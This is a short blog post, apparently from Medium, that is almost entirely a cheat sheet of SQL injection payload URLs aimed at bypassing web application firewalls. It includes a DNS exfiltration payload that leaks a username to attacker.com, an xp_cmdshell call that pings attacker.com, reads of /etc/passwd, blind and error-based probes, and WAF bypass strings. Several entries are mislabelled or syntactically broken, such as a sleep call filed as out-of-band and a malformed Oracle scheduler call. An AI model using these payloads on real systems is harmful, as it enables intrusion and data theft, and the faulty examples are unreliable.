Open in app

Sign in

Write

Sign in

Sleep
2 min readJun 20, 2024

Advanced SQL Injection Techniques to Bypass Security Firewalls

1. Out-of-Band (OOB) SQL Injection

# OOB via DNS Exfiltration
http://example.com/page.php?id=1'; SELECT load_file(concat(‘\\\\’, (SELECT username FROM users LIMIT 1), ‘.attacker.com\\’)) —

# OOB via HTTP Requests
http://example.com/page.php?id=1'; SELECT pg_sleep(10) —

2. Time-based Blind SQL Injection

# Time-based Blind SQL Injection
http://example.com/page.php?id=1' AND IF(SUBSTRING(database(), 1, 1) = ‘m’, sleep(10), 0) —

# Time-based Blind SQL Injection (MSSQL)
http://example.com/page.php?id=1'; IF(SUBSTRING((SELECT @@version), 25, 1) = ‘1’, WAITFOR DELAY ‘0:0:10’, 0) —

# Time-based Blind SQL Injection (Oracle)
http://example.com/page.php?id=1' AND dbms_pipe.receive_message((‘a’),10) —

3. Advanced Error-based SQL Injection

# Advanced Error-based SQL Injection (MySQL)
http://example.com/page.php?id=1' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT (SELECT (SELECT CONCAT(0x7e,0x27,unhex(hex(version())))))) FROM information_schema.tables LIMIT 0,1), FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x) —

# Advanced Error-based SQL Injection (PostgreSQL)
http://example.com/page.php?id=1' UNION SELECT CASE WHEN (SELECT current_database())=’postgres’ THEN pg_sleep(10) ELSE pg_sleep(0) END; —

4. Bypassing WAF and IDS

# Bypassing Web Application Firewalls (WAF)
http://example.com/page.php?id=1'/**/OR/**/1=1# — -%20

# Bypassing Intrusion Detection Systems (IDS)
http://example.com/page.php?id=-1' UNION SELECT 1,2,3,4 — #

5. Second-Order SQL Injection

# Second-Order SQL Injection Example
1. Inject SQL: http://example.com/page.php?id=1; INSERT INTO logs (data) VALUES (‘SQL Injection’);

2. Later, the injected data is displayed or processed, triggering the payload.

6. File-based SQL Injection

# File-based SQL Injection (MySQL)
http://example.com/page.php?id=-1' UNION SELECT LOAD_FILE(‘/etc/passwd’) —

# File-based SQL Injection (PostgreSQL)
http://example.com/page.php?id=-1' UNION SELECT NULL, pg_read_file(‘/etc/passwd’), NULL —

7. Exploiting Function and Procedure Calls

# Exploiting Function and Procedure Calls (MSSQL)
http://example.com/page.php?id=1'; EXEC master.dbo.xp_cmdshell ‘ping attacker.com’ —

# Exploiting Function and Procedure Calls (Oracle)
http://example.com/page.php?id=1'; EXEC DBMS_SCHEDULER.CREATE_JOB(‘PingJob’,’’’BEGIN DBMS_SCHEDULER.RUN_JOB(‘PingJob’); END;’’’); —

8. SQL Injection via HTTP Headers

# SQL Injection via HTTP Headers
GET /page.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://example.com/page.php?id=1' UNION SELECT 1,2,3,4 — #

Sleep
Sleep

Written by Sleep

153 Followers
41 Following

https://www.linkedin.com/in/clumsy/ https://sleepthegod.github.io

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams